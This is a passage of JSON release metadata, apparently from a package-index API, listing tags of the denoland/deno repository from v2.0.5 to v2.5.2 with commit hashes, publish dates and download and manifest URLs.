nd/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden